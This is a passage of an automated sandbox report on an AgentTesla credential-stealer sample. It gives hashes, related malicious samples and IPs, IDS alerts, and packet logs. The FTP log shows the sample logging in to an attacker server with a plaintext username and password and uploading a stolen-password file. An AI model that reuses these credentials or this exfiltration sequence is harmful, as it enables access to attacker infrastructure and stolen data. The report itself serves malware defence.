                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ftp.normagroup.com.trhesaphareket.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99
                                                wKmhzHd4MC.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99
                                                hesaphareketi__20241001.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99
                                                EUR Swift Bildirimi12-08-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99
                                                LisectAVT_2403002A_134.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99
                                                hesaphareketi_____.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99
                                                hesaphareketi__.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99
                                                hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99
                                                hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99
                                                hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.247.165.99

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ASN-QUADRANET-GLOBALUSRFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                • 69.174.99.131
                                                quotation.exeGet hashmaliciousFormBookBrowse
                                                • 155.94.253.4
                                                Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 66.63.187.246
                                                sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                • 154.205.102.33
                                                la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                • 104.200.67.193
                                                la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 103.230.140.211
                                                botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 199.180.254.132
                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • 155.94.253.4
                                                armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 193.111.248.45
                                                mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 193.111.248.45

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):4.987741447178301
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:pE7icjUisS.exe
                                                File size:239'104 bytes
                                                MD5:95c864e4a99b56f70fe18081066ed7b3
                                                SHA1:a8112f75b9869798c6e15782cd651690f1b6faf8
                                                SHA256:fcb6030b15822380735483e1911f0148961b7f7cc4a9fe30561825ed3cd22dbc
                                                SHA512:66330ffc5800b4645ed2db0da7401271680ec7fd1f45f507de228847996532ef2763078aa9e95cba727b0a339c922831b84aae892db7a8e305cdbfb811ef0e85
                                                SSDEEP:3072:QOw/k7XjnbP29wMYISDyFowVpNU5lA5Iazt:xws7Xjnbu9zYISDLwVpNn5fz
                                                TLSH:62341E037E88EB15E1A83E3782EF6D2413B2B4C71633D60B6F49AFA518516425C7E72D
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x43b9fe
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6604D612 [Thu Mar 28 02:29:38 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3b9ac0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x546.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x39a040x39c0004fa7d4fe71e5153e384c1479670226dFalse0.35598028273809523data4.999091211254317IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x3c0000x5460x60024d25170dba5f4a0d8d7afa9ed6e09f9False0.4016927083333333data4.003023872957898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x3e0000xc0x200a4e9d59a1ed0fd9b29b29b052f2fcf6dFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x3c0a00x2bcdata0.44142857142857145
                                                RT_MANIFEST0x3c35c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-12-03T15:57:16.502872+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.749711104.247.165.9921TCP
                                                2024-12-03T15:57:17.679216+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.749720104.247.165.9951146TCP
                                                2024-12-03T15:57:17.800328+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.749720104.247.165.9951146TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 3, 2024 15:57:12.316935062 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:12.436922073 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:12.437031031 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:13.687917948 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:13.690722942 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:13.810762882 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:14.132723093 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:14.133841038 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:14.253798962 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:14.604690075 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:14.605032921 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:14.724991083 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:15.047388077 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:15.047589064 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:15.167690992 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:15.490068913 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:15.490397930 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:15.611713886 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:15.939477921 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:15.939666033 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:16.059964895 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:16.381412029 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:16.382240057 CET4972051146192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:16.431072950 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:16.502404928 CET5114649720104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:16.502825975 CET4972051146192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:16.502871990 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:16.623090029 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:17.678606033 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:17.679215908 CET4972051146192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:17.679215908 CET4972051146192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:17.727978945 CET4971121192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:17.799144030 CET5114649720104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:17.800214052 CET5114649720104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:17.800328016 CET4972051146192.168.2.7104.247.165.99
                                                Dec 3, 2024 15:57:18.121918917 CET2149711104.247.165.99192.168.2.7
                                                Dec 3, 2024 15:57:18.165328026 CET4971121192.168.2.7104.247.165.99

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 3, 2024 15:57:11.752593994 CET5382753192.168.2.71.1.1.1
                                                Dec 3, 2024 15:57:12.308768034 CET53538271.1.1.1192.168.2.7

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 3, 2024 15:57:11.752593994 CET192.168.2.71.1.1.10x5833Standard query (0)ftp.normagroup.com.trA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 3, 2024 15:57:12.308768034 CET1.1.1.1192.168.2.70x5833No error (0)ftp.normagroup.com.tr104.247.165.99A (IP address)IN (0x0001)false

                                                FTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Dec 3, 2024 15:57:13.687917948 CET2149711104.247.165.99192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 17:57. Server port: 21.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 17:57. Server port: 21.220-This is a private system - No anonymous login
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 17:57. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 17:57. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                Dec 3, 2024 15:57:13.690722942 CET4971121192.168.2.7104.247.165.99USER admins@normagroup.com.tr
                                                Dec 3, 2024 15:57:14.132723093 CET2149711104.247.165.99192.168.2.7331 User admins@normagroup.com.tr OK. Password required
                                                Dec 3, 2024 15:57:14.133841038 CET4971121192.168.2.7104.247.165.99PASS ab+LNvim5PAo
                                                Dec 3, 2024 15:57:14.604690075 CET2149711104.247.165.99192.168.2.7230 OK. Current restricted directory is /
                                                Dec 3, 2024 15:57:15.047388077 CET2149711104.247.165.99192.168.2.7504 Unknown command
                                                Dec 3, 2024 15:57:15.047589064 CET4971121192.168.2.7104.247.165.99PWD
                                                Dec 3, 2024 15:57:15.490068913 CET2149711104.247.165.99192.168.2.7257 "/" is your current location
                                                Dec 3, 2024 15:57:15.490397930 CET4971121192.168.2.7104.247.165.99TYPE I
                                                Dec 3, 2024 15:57:15.939477921 CET2149711104.247.165.99192.168.2.7200 TYPE is now 8-bit binary
                                                Dec 3, 2024 15:57:15.939666033 CET4971121192.168.2.7104.247.165.99PASV
                                                Dec 3, 2024 15:57:16.381412029 CET2149711104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,199,202)
                                                Dec 3, 2024 15:57:16.502871990 CET4971121192.168.2.7104.247.165.99STOR PW_user-960781_2024_12_03_09_57_10.html
                                                Dec 3, 2024 15:57:17.678606033 CET2149711104.247.165.99192.168.2.7150 Accepted data connection
                                                Dec 3, 2024 15:57:18.121918917 CET2149711104.247.165.99192.168.2.7226-File successfully transferred
                                                226-File successfully transferred226 0.443 seconds (measured here), 0.71 Kbytes per second

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:09:57:09
                                                Start date:03/12/2024
                                                Path:C:\Users\user\Desktop\pE7icjUisS.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\pE7icjUisS.exe"
                                                Imagebase:0xb30000
                                                File size:239'104 bytes
                                                MD5 hash:95C864E4A99B56F70FE18081066ED7B3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:7.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:3
                                                  Total number of Limit Nodes:0
                                                  execution_graph 37774 626e180 37775 626e1c6 GlobalMemoryStatusEx 37774->37775 37776 626e1f6 37775->37776

                                                  Executed Functions

                                                  Function 06260040 Relevance: .9, Instructions: 939COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6cae83fa977c851a5b7c03d0ffa0fc27e9f2d62ce6337d8edab8d70bed74da0
                                                  • Instruction ID: 8096961e1c84fad304675a67c2ca604ae870a88ae2e78629fd8a3f32cb37a611
                                                  • Opcode Fuzzy Hash: a6cae83fa977c851a5b7c03d0ffa0fc27e9f2d62ce6337d8edab8d70bed74da0
                                                  • Instruction Fuzzy Hash: B5825D30E10615CFDB64DF65C544A9DB7B2FF85300F54C6AAE849AB264EB70ED85CB80
                                                  Function 06263F30 Relevance: .8, Instructions: 809COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ba675ab2eb19999e3a934756d91c2c1f37caec52eec02ade98c7217fb83f172
                                                  • Instruction ID: c4b1c4f32fd56754b036cd705f6ccf098ff0b710ea21d46b7f39f33f11a107f7
                                                  • Opcode Fuzzy Hash: 6ba675ab2eb19999e3a934756d91c2c1f37caec52eec02ade98c7217fb83f172
                                                  • Instruction Fuzzy Hash: 78627F34B102158FDB64EB6AD5806AEBBF2EF84314F14C569E845DB394DB71EC82CB90
                                                  Function 06268D1F Relevance: .6, Instructions: 594COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5568933725bb850ccb27906969db1d4a2b1ea1d4cfce1bdf63ac3eaf8bac5eb9
                                                  • Instruction ID: cd7586da560205df379a6bd634df22d9e3bb6ec2a3d9e3f50cbf21dd4aabc1b4
                                                  • Opcode Fuzzy Hash: 5568933725bb850ccb27906969db1d4a2b1ea1d4cfce1bdf63ac3eaf8bac5eb9
                                                  • Instruction Fuzzy Hash: 7B224370E2020A8FEF64DB69D4907AEB7B6EB89310F204526F815DB395DA35DCC1CB61
                                                  Function 06262AF8 Relevance: .6, Instructions: 586COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1333 6262af8-6262b15 1334 6262b17-6262b1a 1333->1334 1335 6262b1c-6262b22 1334->1335 1336 6262b2d-6262b30 1334->1336 1337 6262bef-6262bf2 1335->1337 1338 6262b28 1335->1338 1339 6262b32-6262b38 1336->1339 1340 6262b43-6262b46 1336->1340 1345 6262bf7-6262bfa 1337->1345 1338->1336 1341 6262b3e 1339->1341 1342 6262c4d-6262c53 1339->1342 1343 6262b4d-6262b50 1340->1343 1344 6262b48-6262b4a 1340->1344 1341->1340 1348 6262cc4-6262cf3 1342->1348 1349 6262c55-6262c5d 1342->1349 1346 6262b64-6262b67 1343->1346 1347 6262b52-6262b5f 1343->1347 1344->1343 1350 6262c02-6262c05 1345->1350 1351 6262bfc-6262bfd 1345->1351 1352 6262b75-6262b78 1346->1352 1353 6262b69-6262b70 1346->1353 1347->1346 1370 6262cfd-6262d00 1348->1370 1349->1348 1354 6262c5f-6262c6c 1349->1354 1355 6262c07-6262c0a 1350->1355 1356 6262c0f-6262c12 1350->1356 1351->1350 1360 6262b95-6262b98 1352->1360 1361 6262b7a-6262b90 1352->1361 1353->1352 1354->1348 1359 6262c6e-6262c72 1354->1359 1355->1356 1362 6262c14-6262c1a 1356->1362 1363 6262c21-6262c24 1356->1363 1366 6262c77-6262c7a 1359->1366 1360->1362 1367 6262b9a-6262b9d 1360->1367 1361->1360 1368 6262c8c-6262c96 1362->1368 1369 6262c1c 1362->1369 1364 6262c26-6262c43 1363->1364 1365 6262c48-6262c4b 1363->1365 1364->1365 1365->1342 1365->1366 1371 6262c87-6262c8a 1366->1371 1372 6262c7c-6262c80 1366->1372 1374 6262bb3-6262bb6 1367->1374 1375 6262b9f-6262bae 1367->1375 1376 6262c9d-6262c9f 1368->1376 1369->1363 1379 6262d02-6262d09 1370->1379 1380 6262d0a-6262d0d 1370->1380 1371->1368 1383 6262ca4-6262ca6 1371->1383 1381 6262cb6-6262cc3 1372->1381 1382 6262c82 1372->1382 1374->1339 1378 6262bbc-6262bbf 1374->1378 1375->1374 1376->1383 1387 6262bc1-6262bca 1378->1387 1388 6262bcb-6262bce 1378->1388 1389 6262d25-6262d28 1380->1389 1390 6262d0f-6262d20 1380->1390 1382->1371 1385 6262cad-6262cb0 1383->1385 1386 6262ca8 1383->1386 1385->1334 1385->1381 1386->1385 1393 6262bd0-6262be5 1388->1393 1394 6262bea-6262bed 1388->1394 1391 6262d4a-6262d4d 1389->1391 1392 6262d2a-6262d2e 1389->1392 1390->1389 1398 6262d5e-6262d61 1391->1398 1399 6262d4f-6262d59 1391->1399 1396 6262d34-6262d3c 1392->1396 1397 6262de2-6262e1c 1392->1397 1393->1394 1394->1337 1394->1345 1396->1397 1401 6262d42-6262d45 1396->1401 1413 6262e1e-6262e21 1397->1413 1403 6262d63-6262d67 1398->1403 1404 6262d7b-6262d7e 1398->1404 1399->1398 1401->1391 1403->1397 1406 6262d69-6262d71 1403->1406 1407 6262d80-6262d87 1404->1407 1408 6262d8e-6262d91 1404->1408 1406->1397 1410 6262d73-6262d76 1406->1410 1411 6262dda-6262de1 1407->1411 1412 6262d89 1407->1412 1414 6262d93-6262d97 1408->1414 1415 6262dab-6262dae 1408->1415 1410->1404 1412->1408 1419 6262e23-6262e36 1413->1419 1420 6262e39-6262e3c 1413->1420 1414->1397 1416 6262d99-6262da1 1414->1416 1417 6262db0-6262db4 1415->1417 1418 6262dc8-6262dca 1415->1418 1416->1397 1421 6262da3-6262da6 1416->1421 1417->1397 1424 6262db6-6262dbe 1417->1424 1425 6262dd1-6262dd4 1418->1425 1426 6262dcc 1418->1426 1422 6262e56-6262e59 1420->1422 1423 6262e3e-6262e4f 1420->1423 1421->1415 1429 6262e77-6262e7a 1422->1429 1430 6262e5b-6262e6c 1422->1430 1423->1419 1434 6262e51 1423->1434 1424->1397 1428 6262dc0-6262dc3 1424->1428 1425->1370 1425->1411 1426->1425 1428->1418 1432 6263163-6263166 1429->1432 1433 6262e80-6263014 1429->1433 1437 6262e72 1430->1437 1438 626319f-62631b0 1430->1438 1432->1433 1436 626316c-626316f 1432->1436 1482 626314d-6263160 1433->1482 1483 626301a-6263021 1433->1483 1434->1422 1439 6263171-6263178 1436->1439 1440 626317d-6263180 1436->1440 1437->1429 1438->1439 1447 62631b2 1438->1447 1439->1440 1442 6263182-6263193 1440->1442 1443 626319a-626319d 1440->1443 1442->1439 1454 6263195 1442->1454 1443->1438 1445 62631b7-62631ba 1443->1445 1448 62631d4-62631d7 1445->1448 1449 62631bc-62631cd 1445->1449 1447->1445 1452 62631e1-62631e4 1448->1452 1453 62631d9-62631de 1448->1453 1449->1439 1459 62631cf 1449->1459 1456 62631e6-62631ed 1452->1456 1457 62631f2-62631f5 1452->1457 1453->1452 1454->1443 1456->1457 1457->1433 1460 62631fb-62631fd 1457->1460 1459->1448 1461 6263204-6263207 1460->1461 1462 62631ff 1460->1462 1461->1413 1463 626320d-6263216 1461->1463 1462->1461 1484 6263027-626304a 1483->1484 1485 62630d5-62630dc 1483->1485 1494 6263052-626305a 1484->1494 1485->1482 1486 62630de-6263111 1485->1486 1498 6263116-6263143 1486->1498 1499 6263113 1486->1499 1495 626305f-62630a0 1494->1495 1496 626305c 1494->1496 1507 62630a2-62630b3 1495->1507 1508 62630b8-62630c9 1495->1508 1496->1495 1498->1463 1499->1498 1507->1463 1508->1463
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3858309771.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6260000_pE7icjUisS.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5c2339787033a648406bcbaf3beed6b6a8d1436e5164980159ec7d8df9cbfb8
                                                  • Instruction ID: a7697b7999d45bb551aefc56d7bd374b1fa1ba27582adb7fed30311caffb9676
                                                  • Opcode Fuzzy Hash: b5c2339787033a648406bcbaf3beed6b6a8d1436e5164980159ec7d8df9cbfb8
                                                  • Instruction Fuzzy Hash: 1B22B331E11216CFDF64DBA9C4807AEBBB2FF85310F248569E845AB394DA35DD81CB90
                                                  Function 0626BCD8 Relevance: .6, Instructions: 570COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
